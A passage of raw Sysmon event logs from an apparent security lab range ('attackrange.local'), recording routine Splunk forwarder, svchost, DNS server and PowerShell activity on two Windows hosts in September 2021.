Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.019{5EBD8912-8CD6-6151-6400-00000000FD01}3328C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980534Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:22.402{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B585E5201506E2448C18553F93A9FCFD,SHA256=9176C82492F38583F7C91C32AD5DDF673F3ED5457AD136EBC98D99EC13277FF8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6D00-00000000FD01}3316C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6D00-00000000FD01}3316C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.519{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6D00-00000000FD01}3316C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.909{5EBD8912-8CD6-6151-6D00-00000000FD01}3316C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.754{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15-58387- 354300x80000000000000001054250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.366{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64184- 354300x80000000000000001054249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.351{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61541- 354300x80000000000000001054248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.988{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51937- 354300x80000000000000001054247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.988{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61540- 354300x80000000000000001054246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.988{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61538- 354300x80000000000000001054245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.988{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61539- 23542300x80000000000000001054244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.151{5EBD8912-8CD6-6151-6900-00000000FD01}3836NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980535Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:23.634{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A98ADEB03D701AAD8B38FCD7D0A52CB3,SHA256=B89BB17BE230056862D7DDC9B4118D29C0D3756709E1E91A1FF9EB84D6385704,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.052{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61542- 354300x80000000000000001054266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.052{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55345- 10341000x80000000000000001054265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:24.284{5EBD8912-8CC0-6151-1400-00000000FD01}10401656C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980537Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:24.806{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FC34F1AF95A7BB7E6B75510C38B1CA3,SHA256=7DD911AB1BEE15E670290ACDB78DE2258FF7B3EC441AA8A141F22A1B27627460,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000980536Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:20.561{69CF5F33-7F28-614D-1400-00000000FD01}368win-dc-429.attackrange.local1460-C:\Windows\System32\svchost.exe 354300x80000000000000001054269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.063{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61542- 354300x80000000000000001054268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:23.063{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-55345- 10341000x8000000000000000980553Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.899{69CF5F33-8CD9-6151-FF79-00000000FD01}32401064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980552Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.868{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D4E39E58B9E56799EE9CC9B089D9A2E,SHA256=C2D8C3388EC582961650211AFBE313F1E0E5ED451457AF2ACC6966F09F0815E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980551Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.665{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CD9-6151-FF79-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980550Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980549Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980548Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 